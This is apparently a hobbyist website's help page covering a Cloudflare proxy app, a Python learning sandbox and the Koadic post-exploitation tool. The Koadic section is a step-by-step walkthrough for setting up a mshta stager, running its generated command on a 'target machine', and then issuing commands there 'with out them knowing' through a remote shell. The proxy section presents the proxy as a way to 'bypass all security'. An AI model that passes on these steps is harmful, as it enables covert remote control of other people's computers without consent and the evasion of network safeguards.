Proxy1
Proxy1 is the first proxy app you will see in the apps page. It is a cloudflare proxy. Cloudflare has a whole bunch of IT implications and has even been declared the VPN killer. But we will only be going over the way to use the proxy part of it which is provided for you in the Apps portion of the website. First go to the Apps section of the website then click the first button that says proxy. Next It will bring you to a website called cloudflare, find the go button to the left of that you will see a random link, click on it and delete it. After you've done that you can type the website you want to go to and it will bypass all security and open a safe and secure link with the website you want. But there is a quicker way if you cant remember the website link or you just want to get to stuff quicker or search something. Follow all the same steps accept this time type google.com!

Python
Python is personally my favorite and best coding language; if you want to learn it I recommend the you go to the Apps page of the website and click Python it will bring you to the CMU academy sandbox, there will be a drop down at the top where you can click docs and start trying to figure it out your self. That's actually how I started out and I still say the best way to learn something is to figure it out for your self and that's the best way to do it. Or, if you like having structure or are just impatient you can do their hour of code to start out which I also think is a great way to go. After that you will have some basics of Python coding and if you want to keep the structure of you being taught and then getting some hands on experience I strongly suggest that you take some of their coding courses and maybe even try some new coding languages.

Github is just an advanced IT engine with several different features and add on's for all fields of IT.
Koadic
Koadic is a tool that comes with most Linux distributions like Kali.
Frist go into Kali or Virtual box and open the terminal. Next you want to type Koadic and ENTER if its not installed follow the instructions and install it. After that you will want to type "use stager/js/mshta" hit ENTER
Then, type "info" and hit ENTER. Next, type "set Endpoint patinstall". Then, type "run" and hit ENTER.
After that it will show you 2 lines, copy the second one and open cmd admin on the target machine and paste the command, hit ENTER. Then on your computer type "zombies" and hit ENTER. Then type "cmdshell 0" and you can type any cmd command and it will do that command on the target machine with out them knowing and it will show the output on your computer!
